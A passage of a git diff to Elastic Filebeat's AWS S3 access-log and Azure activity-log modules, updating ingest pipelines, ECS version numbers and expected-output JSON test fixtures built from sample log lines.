"log", "log.offset": 1429, "related.ip": [ @@ -181,6 +211,9 @@ "tls.cipher": "ECDHE-RSA-AES128-SHA", "tls.version": "1.2", "tls.version_protocol": "tls", + "url.original": "/test-s3-ks/?max-keys=0&encoding-type=url&aws-account=627959692251", + "url.path": "/test-s3-ks/", + "url.query": "max-keys=0&encoding-type=url&aws-account=627959692251", "user_agent.device.name": "Other", "user_agent.name": "aws-sdk-java", "user_agent.original": "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation", @@ -213,12 +246,17 @@ "client.user.id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9", "cloud.provider": "aws", "event.action": "REST.GET.LOCATION", + "event.category": "web", "event.dataset": "aws.s3access", - "event.duration": "4", + "event.duration": 4000000, "event.id": "706992E2F3CC3C3D", "event.kind": "event", "event.module": "aws", + "event.original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - \"GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1\" 200 - 142 - 4 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", "geo.city_name": "Ashburn", "geo.continent_name": "North America", @@ -228,7 +266,10 @@ "geo.location.lon": -77.4728, "geo.region_iso_code": "US-VA", "geo.region_name": "Virginia", + "http.request.method": "GET", + "http.response.body.bytes": 142, "http.response.status_code": 200, + "http.version": "1.1", "input.type": "log", "log.offset": 2161, "related.ip": [ @@ -244,6 +285,9 @@ "tls.cipher": "ECDHE-RSA-AES128-SHA", "tls.version": "1.2", "tls.version_protocol": "tls", + "url.original": "/test-s3-ks/?location&aws-account=627959692251", + "url.path": "/test-s3-ks/", + "url.query": "location&aws-account=627959692251", "user_agent.device.name": "Other", "user_agent.name": "aws-sdk-java", "user_agent.original": "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation", @@ -274,11 +318,16 @@ "client.user.id": "arn:aws:iam::123456:user/test@elastic.co", "cloud.provider": "aws", "event.action": "BATCH.DELETE.OBJECT", + "event.category": "web", "event.dataset": "aws.s3access", "event.id": "8CD7A4A71E2E5C9E", "event.kind": "event", "event.module": "aws", + "event.original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 77.227.156.41 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", "geo.city_name": "Teruel", "geo.continent_name": "Europe", @@ -327,11 +376,16 @@ "client.user.id": "arn:aws:iam::123456:user/test@elastic.co", "cloud.provider": "aws", "event.action": "BATCH.DELETE.OBJECT", + "event.category": "web", "event.dataset": "aws.s3access", "event.id": "6CE38F1312D32BDD", "event.kind": "event", "event.module": "aws", + "event.original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [19/Sep/2019:17:06:39 +0000] 174.29.206.152 arn:aws:iam::123456:user/test@elastic.co 6CE38F1312D32BDD BATCH.DELETE.OBJECT Screen+Shot+2019-09-09+at+9.08.44+AM.png - 204 - - 57138 - - - - - LwRa4w6DbuU48GKQiH3jDbjfTyLCbwasFBsdttugRQ+9lH4jK8lT91+HhGZKMYI3sPyKuQ9LvU0= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3-ap-southeast-1.amazonaws.com TLSv1.2", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", "geo.city_name": "Denver", "geo.continent_name": "North America", diff --git a/x-pack/filebeat/module/aws/s3access/test/test.log b/x-pack/filebeat/module/aws/s3access/test/test.log index abb17ce2b453..8e3d2c0aff1c 100644 --- a/x-pack/filebeat/module/aws/s3access/test/test.log +++ b/x-pack/filebeat/module/aws/s3access/test/test.log @@ -3,3 +3,4 @@ 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be awsexamplebucket [06/Feb/2019:00:00:38 +0000] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be A1206F460EXAMPLE REST.GET.BUCKETPOLICY - "GET /awsexamplebucket?policy HTTP/1.1" 404 NoSuchBucketPolicy 297 - 38 - "-" "S3Console/0.4" - BNaBsXZQQDbssi6xMBdBU2sLt+Yf5kZDmeBUP35sFoKa3sLLeMC78iwEIWxs99CRUrbS4n11234= SigV2 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be awsexamplebucket [06/Feb/2019:00:01:00 +0000] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be 7B4A0FABBEXAMPLE REST.GET.VERSIONING - "GET /awsexamplebucket?versioning HTTP/1.1" 200 - 113 - 33 - "-" "S3Console/0.4" - Ke1bUcazaN1jWuUlPJaxF64cQVpUEhoZKEG/hmy/gijN/I1DeWqDfFvnpybfEseEME/u7ME1234= SigV2 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be awsexamplebucket [06/Feb/2019:00:01:57 +0000] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be DD6CC733AEXAMPLE REST.PUT.OBJECT s3-dg.pdf "PUT /awsexamplebucket/s3-dg.pdf HTTP/1.1" 200 - - 4406583 41754 28 "-" "S3Console/0.4" - 10S62Zv81kBW7BB6SX4XJ48o6kpcl6LPwEoizZQQxJd5qDSCTLX0TgS37kYUBKQW3+bPdrg1234= SigV4 ECDHE-RSA-AES128-SHA AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1 +79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be faketest [09/Feb/2021:14:48:42 +0200] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be DD6CC733AEXAMPLE REST.OPTIONS.FAKE s3-dg.pdf "OPTIONS * HTTP/1.0" 200 - - 4406583 41754 28 "-" "S3Console/0.4" - 10S62Zv81kBW7BB6SX4XJ48o6kpcl6LPwEoizZQQxJd5qDSCTLX0TgS37kYUBKQW3+bPdrg1234= SigV4 ECDHE-RSA-AES128-SHA AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1 diff --git a/x-pack/filebeat/module/aws/s3access/test/test.log-expected.json b/x-pack/filebeat/module/aws/s3access/test/test.log-expected.json index fb6c38fb1085..f6ca4d4edf36 100644 --- a/x-pack/filebeat/module/aws/s3access/test/test.log-expected.json +++ b/x-pack/filebeat/module/aws/s3access/test/test.log-expected.json @@ -23,14 +23,22 @@ "client.user.id": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be", "cloud.provider": "aws", "event.action": "REST.GET.VERSIONING", + "event.category": "web", "event.dataset": "aws.s3access", - "event.duration": "7", + "event.duration": 7000000, "event.id": "3E57427F3EXAMPLE", "event.kind": "event", "event.module": "aws", + "event.original": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be awsexamplebucket [06/Feb/2019:00:00:38 +0000] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be 3E57427F3EXAMPLE REST.GET.VERSIONING - \"GET /awsexamplebucket?versioning HTTP/1.1\" 200 - 113 - 7 - \"-\" \"S3Console/0.4\" - s9lzHYrFp76ZVxRcpX9+5cjAnEH2ROuNkd2BHfIa6UkFVdtjf5mKR3/eTPFvsiP/XV/VLi31234= SigV2 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", + "http.request.method": "GET", + "http.response.body.bytes": 113, "http.response.status_code": 200, + "http.version": "1.1", "input.type": "log", "log.offset": 0, "related.ip": [ @@ -46,6 +54,9 @@ "tls.cipher": "ECDHE-RSA-AES128-GCM-SHA256", "tls.version": "1.1", "tls.version_protocol": "tls", + "url.original": "/awsexamplebucket?versioning", + "url.path": "/awsexamplebucket", + "url.query": "versioning", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" @@ -74,14 +85,22 @@ "client.user.id": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be", "cloud.provider": "aws", "event.action": "REST.GET.LOGGING_STATUS", + "event.category": "web", "event.dataset": "aws.s3access", - "event.duration": "11", + "event.duration": 11000000, "event.id": "891CE47D2EXAMPLE", "event.kind": "event", "event.module": "aws", + "event.original": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be awsexamplebucket [06/Feb/2019:00:00:38 +0000] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be 891CE47D2EXAMPLE REST.GET.LOGGING_STATUS - \"GET /awsexamplebucket?logging HTTP/1.1\" 200 - 242 - 11 - \"-\" \"S3Console/0.4\" - 9vKBE6vMhrNiWHZmb2L0mXOcqPGzQOI5XLnCtZNPxev+Hf+7tpT6sxDwDty4LHBUOZJG96N1234= SigV2 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", + "http.request.method": "GET", + "http.response.body.bytes": 242, "http.response.status_code": 200, + "http.version": "1.1", "input.type": "log", "log.offset": 471, "related.ip": [ @@ -97,6 +116,9 @@ "tls.cipher": "ECDHE-RSA-AES128-GCM-SHA256", "tls.version": "1.1", "tls.version_protocol": "tls", + "url.original": "/awsexamplebucket?logging", + "url.path": "/awsexamplebucket", + "url.query": "logging", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" @@ -126,15 +148,23 @@ "client.user.id": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be", "cloud.provider": "aws", "event.action": "REST.GET.BUCKETPOLICY", + "event.category": "web", "event.code": "NoSuchBucketPolicy", "event.dataset": "aws.s3access", - "event.duration": "38", + "event.duration": 38000000, "event.id": "A1206F460EXAMPLE", "event.kind": "event", "event.module": "aws", + "event.original": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be awsexamplebucket [06/Feb/2019:00:00:38 +0000] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be A1206F460EXAMPLE REST.GET.BUCKETPOLICY - \"GET /awsexamplebucket?policy HTTP/1.1\" 404 NoSuchBucketPolicy 297 - 38 - \"-\" \"S3Console/0.4\" - BNaBsXZQQDbssi6xMBdBU2sLt+Yf5kZDmeBUP35sFoKa3sLLeMC78iwEIWxs99CRUrbS4n11234= SigV2 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1", "event.outcome": "failure", + "event.type": [ + "access" + ], "fileset.name": "s3access", + "http.request.method": "GET", + "http.response.body.bytes": 297, "http.response.status_code": 404, + "http.version": "1.1", "input.type": "log", "log.offset": 944, "related.ip": [ @@ -150,6 +180,9 @@ "tls.cipher": "ECDHE-RSA-AES128-GCM-SHA256", "tls.version": "1.1", "tls.version_protocol": "tls", + "url.original": "/awsexamplebucket?policy", + "url.path": "/awsexamplebucket", + "url.query": "policy", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" @@ -178,14 +211,22 @@ "client.user.id": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be", "cloud.provider": "aws", "event.action": "REST.GET.VERSIONING", + "event.category": "web", "event.dataset": "aws.s3access", - "event.duration": "33", + "event.duration": 33000000, "event.id": "7B4A0FABBEXAMPLE", "event.kind": "event", "event.module": "aws", + "event.original": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be awsexamplebucket [06/Feb/2019:00:01:00 +0000] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be 7B4A0FABBEXAMPLE REST.GET.VERSIONING - \"GET /awsexamplebucket?versioning HTTP/1.1\" 200 - 113 - 33 - \"-\" \"S3Console/0.4\" - Ke1bUcazaN1jWuUlPJaxF64cQVpUEhoZKEG/hmy/gijN/I1DeWqDfFvnpybfEseEME/u7ME1234= SigV2 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", + "http.request.method": "GET", + "http.response.body.bytes": 113, "http.response.status_code": 200, + "http.version": "1.1", "input.type": "log", "log.offset": 1431, "related.ip": [ @@ -201,6 +242,9 @@ "tls.cipher": "ECDHE-RSA-AES128-GCM-SHA256", "tls.version": "1.1", "tls.version_protocol": "tls", + "url.original": "/awsexamplebucket?versioning", + "url.path": "/awsexamplebucket", + "url.query": "versioning", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" @@ -231,14 +275,21 @@ "client.user.id": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be", "cloud.provider": "aws", "event.action": "REST.PUT.OBJECT", + "event.category": "web", "event.dataset": "aws.s3access", - "event.duration": "41754", + "event.duration": 41754000000, "event.id": "DD6CC733AEXAMPLE", "event.kind": "event", "event.module": "aws", + "event.original": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be awsexamplebucket [06/Feb/2019:00:01:57 +0000] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be DD6CC733AEXAMPLE REST.PUT.OBJECT s3-dg.pdf \"PUT /awsexamplebucket/s3-dg.pdf HTTP/1.1\" 200 - - 4406583 41754 28 \"-\" \"S3Console/0.4\" - 10S62Zv81kBW7BB6SX4XJ48o6kpcl6LPwEoizZQQxJd5qDSCTLX0TgS37kYUBKQW3+bPdrg1234= SigV4 ECDHE-RSA-AES128-SHA AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", + "http.request.method": "PUT", "http.response.status_code": 200, + "http.version": "1.1", "input.type": "log", "log.offset": 1903, "related.ip": [ @@ -254,6 +305,69 @@ "tls.cipher": "ECDHE-RSA-AES128-SHA", "tls.version": "1.1", "tls.version_protocol": "tls", + "url.original": "/awsexamplebucket/s3-dg.pdf", + "url.path": "/awsexamplebucket/s3-dg.pdf", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "S3Console/0.4" + }, + { + "@timestamp": "2021-02-09T12:48:42.000Z", + "aws.s3access.authentication_type": "AuthHeader", + "aws.s3access.bucket": "faketest", + "aws.s3access.bucket_owner": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be", + "aws.s3access.cipher_suite": "ECDHE-RSA-AES128-SHA", + "aws.s3access.host_header": "awsexamplebucket.s3.amazonaws.com", + "aws.s3access.host_id": "10S62Zv81kBW7BB6SX4XJ48o6kpcl6LPwEoizZQQxJd5qDSCTLX0TgS37kYUBKQW3+bPdrg1234=", + "aws.s3access.http_status": 200, + "aws.s3access.key": "s3-dg.pdf", + "aws.s3access.object_size": 4406583, + "aws.s3access.operation": "REST.OPTIONS.FAKE", + "aws.s3access.remote_ip": "192.0.2.3", + "aws.s3access.request_id": "DD6CC733AEXAMPLE", + "aws.s3access.request_uri": "OPTIONS * HTTP/1.0", + "aws.s3access.requester": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be", + "aws.s3access.signature_version": "SigV4", + "aws.s3access.tls_version": "TLSV1.1", + "aws.s3access.total_time": 41754, + "aws.s3access.turn_around_time": 28, + "aws.s3access.user_agent": "S3Console/0.4", + "client.address": "192.0.2.3", + "client.ip": "192.0.2.3", + "client.user.id": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be", + "cloud.provider": "aws", + "event.action": "REST.OPTIONS.FAKE", + "event.category": "web", + "event.dataset": "aws.s3access", + "event.duration": 41754000000, + "event.id": "DD6CC733AEXAMPLE", + "event.kind": "event", + "event.module": "aws", + "event.original": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be faketest [09/Feb/2021:14:48:42 +0200] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be DD6CC733AEXAMPLE REST.OPTIONS.FAKE s3-dg.pdf \"OPTIONS * HTTP/1.0\" 200 - - 4406583 41754 28 \"-\" \"S3Console/0.4\" - 10S62Zv81kBW7BB6SX4XJ48o6kpcl6LPwEoizZQQxJd5qDSCTLX0TgS37kYUBKQW3+bPdrg1234= SigV4 ECDHE-RSA-AES128-SHA AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1", + "event.outcome": "success", + "event.type": [ + "access" + ], + "fileset.name": "s3access", + "http.request.method": "OPTIONS", + "http.response.status_code": 200, + "http.version": "1.0", + "input.type": "log", + "log.offset": 2379, + "related.ip": [ + "192.0.2.3" + ], + "related.user": [ + "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be" + ], + "service.type": "aws", + "tags": [ + "forwarded" + ], + "tls.cipher": "ECDHE-RSA-AES128-SHA", + "tls.version": "1.1", + "tls.version_protocol": "tls", + "url.original": "*", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" diff --git a/x-pack/filebeat/module/aws/vpcflow/config/input.yml b/x-pack/filebeat/module/aws/vpcflow/config/input.yml index 1752158d25e6..1f1e085c0829 100644 --- a/x-pack/filebeat/module/aws/vpcflow/config/input.yml +++ b/x-pack/filebeat/module/aws/vpcflow/config/input.yml @@ -181,4 +181,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/activitylogs/config/azure-eventhub.yml b/x-pack/filebeat/module/azure/activitylogs/config/azure-eventhub.yml index 29e6d770780c..8701cae46fb7 100644 --- a/x-pack/filebeat/module/azure/activitylogs/config/azure-eventhub.yml +++ b/x-pack/filebeat/module/azure/activitylogs/config/azure-eventhub.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/activitylogs/config/file.yml b/x-pack/filebeat/module/azure/activitylogs/config/file.yml index 402a1b25b125..4242dc4cd7b2 100644 --- a/x-pack/filebeat/module/azure/activitylogs/config/file.yml +++ b/x-pack/filebeat/module/azure/activitylogs/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/activitylogs/ingest/pipeline.yml b/x-pack/filebeat/module/azure/activitylogs/ingest/pipeline.yml index a7a581db2b28..d9621f0694fc 100644 --- a/x-pack/filebeat/module/azure/activitylogs/ingest/pipeline.yml +++ b/x-pack/filebeat/module/azure/activitylogs/ingest/pipeline.yml @@ -21,10 +21,11 @@ processors: ignore_failure: true formats: - ISO8601 +- rename: + field: message + target_field: event.original - remove: - field: - - message - - azure.activitylogs.time + field: azure.activitylogs.time ignore_missing: true - rename: field: azure.activitylogs.resourceId @@ -34,6 +35,15 @@ processors: field: azure.activitylogs.callerIpAddress target_field: source.ip ignore_missing: true +- set: + field: client.ip + value: '{{source.ip}}' + ignore_empty_value: true +- append: + field: related.ip + value: '{{source.ip}}' + allow_duplicates: false + if: 'ctx.source?.ip != null' - rename: field: azure.activitylogs.level target_field: log.level @@ -223,6 +233,26 @@ processors: patterns: - '%{USERNAME:user.name}@%{HOSTNAME:user.domain}' ignore_missing: true + ignore_failure: true + +# set user.email to the original name if the above grok succeeded. +- set: + field: user.email + value: '{{azure.activitylogs.identity.claims_initiated_by_user.name}}' + ignore_empty_value: true + if: 'ctx.user?.name != null' + +# set user.name to the original name if the above grok failed (name format is not an email). +- set: + field: user.name + value: '{{azure.activitylogs.identity.claims_initiated_by_user.name}}' + ignore_empty_value: true + if: 'ctx.user?.name == null' +- append: + field: related.user + value: '{{user.name}}' + allow_duplicates: false + if: 'ctx.user?.name != null' - convert: field: azure.activitylogs.identity.claims_initiated_by_user.fullname target_field: user.full_name diff --git a/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log-expected.json b/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log-expected.json index 3f86faee0840..245269fbfb6d 100644 --- a/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log-expected.json +++ b/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log-expected.json @@ -35,12 +35,14 @@ "azure.resource.namespace": "AZURELSEVENTS", "azure.resource.provider": "MICROSOFT.EVENTHUB", "azure.subscription_id": "8a4de8b5-095c-47d0-a96f-a75130c61d53", + "client.ip": "51.251.141.41", "cloud.provider": "azure", "event.action": "MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION", "event.dataset": "azure.activitylogs", "event.duration": 0, "event.kind": "event", "event.module": "azure", + "event.original": "{\"callerIpAddress\":\"51.251.141.41\",\"category\":\"Action\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":{\"authorization\":{\"action\":\"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action\",\"evidence\":{\"principalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"principalType\":\"ServicePrincipal\",\"role\":\"Azure EventGrid Service BuiltIn Role\",\"roleAssignmentId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleAssignmentScope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleDefinitionId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\"},\"scope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey\"},\"claims\":{\"aio\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appidacr\":\"2\",\"aud\":\"https://management.core.windows.net/\",\"exp\":\"1571904826\",\"http://schemas.microsoft.com/identity/claims/identityprovider\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"iat\":\"1571875726\",\"iss\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"nbf\":\"1571875726\",\"uti\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ver\":\"1.0\"}},\"level\":\"Information\",\"location\":\"global\",\"operationName\":\"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION\",\"resourceId\":\"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY\",\"resultSignature\":\"Started.\",\"resultType\":\"Start\",\"time\":\"2019-10-24T00:13:46.3554259Z\"}", "event.type": [ "change" ], @@ -53,6 +55,9 @@ "input.type": "log", "log.level": "Information", "log.offset": 0, + "related.ip": [ + "51.251.141.41" + ], "service.type": "azure", "source.geo.continent_name": "Europe", "source.geo.country_iso_code": "GB", diff --git a/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log-expected.json b/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log-expected.json index 5f14108e4c4f..28c9ca7cd009 100644 --- a/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log-expected.json +++ b/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log-expected.json @@ -39,12 +39,14 @@ "azure.correlation_id": "c776f9f4-36e5-4e0e-809b-c9b3c3fb62a8", "azure.resource.id": "/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841", "azure.resource.provider": "microsoft.support/supporttickets/115012112305841", + "client.ip": "111.111.111.11", "cloud.provider": "azure", "event.action": "microsoft.support/supporttickets/write", "event.dataset": "azure.activitylogs", "event.duration": -1468967296, "event.kind": "event", "event.module": "azure", + "event.original": "{\"time\":\"2015-01-21T22:14:26.9792776Z\",\"resourceId\":\"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841\",\"operationName\":\"microsoft.support/supporttickets/write\",\"category\":\"Write\",\"resultType\":\"Success\",\"resultSignature\":\"Succeeded.Created\",\"durationMs\":2826,\"callerIpAddress\":\"111.111.111.11\",\"correlationId\":\"c776f9f4-36e5-4e0e-809b-c9b3c3fb62a8\",\"identity\":{\"authorization\":{\"scope\":\"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841\",\"action\":\"microsoft.support/supporttickets/write\",\"evidence\":{\"role\":\"Subscription Admin\"}},\"claims\":{\"aud\":\"https://management.core.windows.net/\",\"iss\":\"https://sts.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/\",\"iat\":\"1421876371\",\"nbf\":\"1421876371\",\"exp\":\"1421880271\",\"ver\":\"1.0\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"1e8d8218-c5e7-4578-9acc-9abbd5d23315 \",\"http://schemas.microsoft.com/claims/authnmethodsreferences\":\"pwd\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"2468adf0-8211-44e3-95xq-85137af64708\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn\":\"admin@contoso.com\",\"puid\":\"20030000801A118C\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\":\"9vckmEGF7zDKk1YzIY8k0t1_EAPaXoeHyPRn6f413zM\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname\":\"John\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname\":\"Smith\",\"name\":\"John Smith\",\"groups\":\"cacfe77c-e058-4712-83qw-f9b08849fd60,7f71d11d-4c41-4b23-99d2-d32ce7aa621c,31522864-0578-4ea0-9gdc-e66cc564d18c\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name\":\" admin@contoso.com\",\"appid\":\"c44b4083-3bq0-49c1-b47d-974e53cbdf3c\",\"appidacr\":\"2\",\"http://schemas.microsoft.com/identity/claims/scope\":\"user_impersonation\",\"http://schemas.microsoft.com/claims/authnclassreference\":\"1\"}},\"level\":\"Information\",\"location\":\"global\",\"properties\":{\"statusCode\":\"Created\",\"serviceRequestId\":\"50d5cddb-8ca0-47ad-9b80-6cde2207f97c\"}}", "event.outcome": "success", "event.type": [ "change" @@ -58,6 +60,12 @@ "input.type": "log", "log.level": "Information", "log.offset": 0, + "related.ip": [ + "111.111.111.11" + ], + "related.user": [ + "admin" + ], "service.type": "azure", "source.as.number": 2516, "source.as.organization.name": "KDDI CORPORATION", @@ -71,6 +79,7 @@ "forwarded" ], "user.domain": "contoso.com", + "user.email": " admin@contoso.com", "user.full_name": "John Smith", "user.name": "admin" } diff --git a/x-pack/filebeat/module/azure/auditlogs/config/azure-eventhub.yml 